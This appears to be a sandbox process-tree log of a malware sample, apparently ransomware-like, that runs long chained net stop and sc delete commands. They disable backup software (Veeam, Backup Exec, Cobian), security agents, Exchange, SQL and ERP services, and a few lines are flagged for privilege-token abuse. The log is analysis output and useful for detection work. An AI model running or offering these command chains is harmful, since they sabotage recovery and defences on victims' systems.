C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdWebService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdWebService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamNFSSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc6⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeThrottling6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDeploySvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCloudSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamMountSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamBrokerSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamDistributionSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDistributionSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop tmlisten5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ServiceMid5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop 360EntPGSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop 360EntPGSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ClickToRunSvc5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop RavTask5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RavTask6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AngelOfDeath5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AngelOfDeath6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop d_safe5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop NFLicenceServer5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop "NetVault Process Manager"5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop RavService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RavService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DFServ5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DFServ6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop IngressMgr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IngressMgr6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop EvtSys5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EvtSys6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3ClouManager5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3ClouManager6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFVPrintServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFVPrintServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RTCAVMCU5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTCAVMCU6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup105⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup106⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop GNWebService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop GNWebService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Mysoft.SchedulingService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Mysoft.SchedulingService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AgentX5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AgentX6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop SentinelKeysServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SentinelKeysServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DGPNPSEV5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop TurboCRM705⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TurboCRM706⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFSysService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFSysService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8DispatchService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8DispatchService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop NFOTPService5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop U8EISService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8EISService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8EncryptService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8EncryptService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8GCService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8GCService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8KeyManagePool5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop U8MPool5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8MPool6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SCMPool5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SCMPool6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SLReportService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SLReportService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8TaskService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8TaskService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8WebPool5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WebPool6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFAllNet5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFAllNet6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFReportService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFReportService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop UTUService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UTUService6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService15⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService16⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService25⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService26⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "memcached Server"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "memcached Server"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.45⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.46⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop UFIDAWebService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFIDAWebService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSComplianceAudit5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeCompliance5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeCompliance6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDagMgmt5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDagMgmt6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDelivery5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDelivery6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDiagnostics5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDiagnostics6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFastSearch5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFastSearch6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFrontEndTransport5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFrontEndTransport6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHM5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL20085⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL20086⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHMRecovery5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHMRecovery6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap45⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap46⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIMAP4BE5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIMAP4BE6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxAssistants5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxAssistants6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeNotificationsBroker5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeNotificationsBroker6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePop35⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePop36⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePOP3BE5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePOP3BE6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRepl5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRepl6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRPC5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRPC6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeServiceHost5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeServiceHost6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSubmission5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSubmission6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeTransport5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeTransport6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeThrottling5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeTransportLogSearch5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeTransportLogSearch6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeUM5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeUM6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeUMCR5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeUMCR6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL5_OA5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL5_OA6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete REPLICA5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCATS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RtcQms5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCAVMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCMEETINGMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCIMMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCDATAMCU5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RTCCDR5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectEventService165⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectQueueService165⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SPAdminV45⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SPSearchHostController5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SPTimerV45⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SPTraceV45⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OSearch165⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ProjectCalcService165⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete c2wts5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete AppFabricCachingService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ADWS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoard575⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoardRCService575⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vsvnjobsvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete VisualSVNServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "FlexNet Licensing Service 64"5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete BestSyncSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete LPManager5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MediatekRegistryWriter5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RaAutoInstSrv_RT28705⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup105⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLANYs_sem55⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CASLicenceServer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete semwebsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TbossSystem5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ErpEnvSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.DispatchService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.UpdateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Config.WindowsService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.DataCenterService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.SchedulingService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Setup.InstallService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MysoftUpdate5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8KeyManagePool6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc delete edr_monitor5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete savsvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete abs_deployer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxMonitorService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CloudExchangeService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService2"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete CIS5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete EASService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete KICkSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SmsSrv5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DGPNPSEV6⤵
-
-
-
C:\Windows\SysWOW64\sc.exesc delete OfficeClearCache5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TurboCRM705⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8DispatchService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8EISService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8EncryptService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8GCService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8KeyManagePool5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8MPool"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SCMPool5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8SLReportService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete U8TaskService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WebPool"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UFAllNet5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UFReportService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete UTUService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService1"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UWS LoPriv Services"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftnlsv35⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete FxService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftnlses35⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdwks5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "UtilDev Web Server Pro"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client Guard"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE FileTranS"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete wwbizsrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete qemu-ga5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete AlibabaProtect5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete ZTEVdservice5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete kbasesrv5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MMRHookService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete IpOverUsbSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1005⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete KuaiYunTools5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete KMSELDI5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete btPanel5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Protect_2345Explorer5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete 2345PicSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-agent5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-server5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-worker5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete QQCertificateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleRemExecService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDaemon5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSUserSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDownSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSStorageSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSDataProcSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSGatewaySvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSMediaSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSLoginSvr5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSTomcat65⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSMysqld5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete GPSFtpd5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Zabbix Agent"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentAccelerator5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete bedbg5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecDeviceMediaService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecRPCService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentBrowser5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecManagementService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecJobEngine5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete MDM5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Gailun_Downloader5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete TxQBService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RemoteAssistService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete YunService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete Serv-U5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "EasyFZS Server"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Rpc Monitor"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OpenFastAssist5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Nuo Update Monitor"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "Daemon Service"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete asComSvc5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete OfficeUpdateService5⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete RtcSrv5⤵
-
-
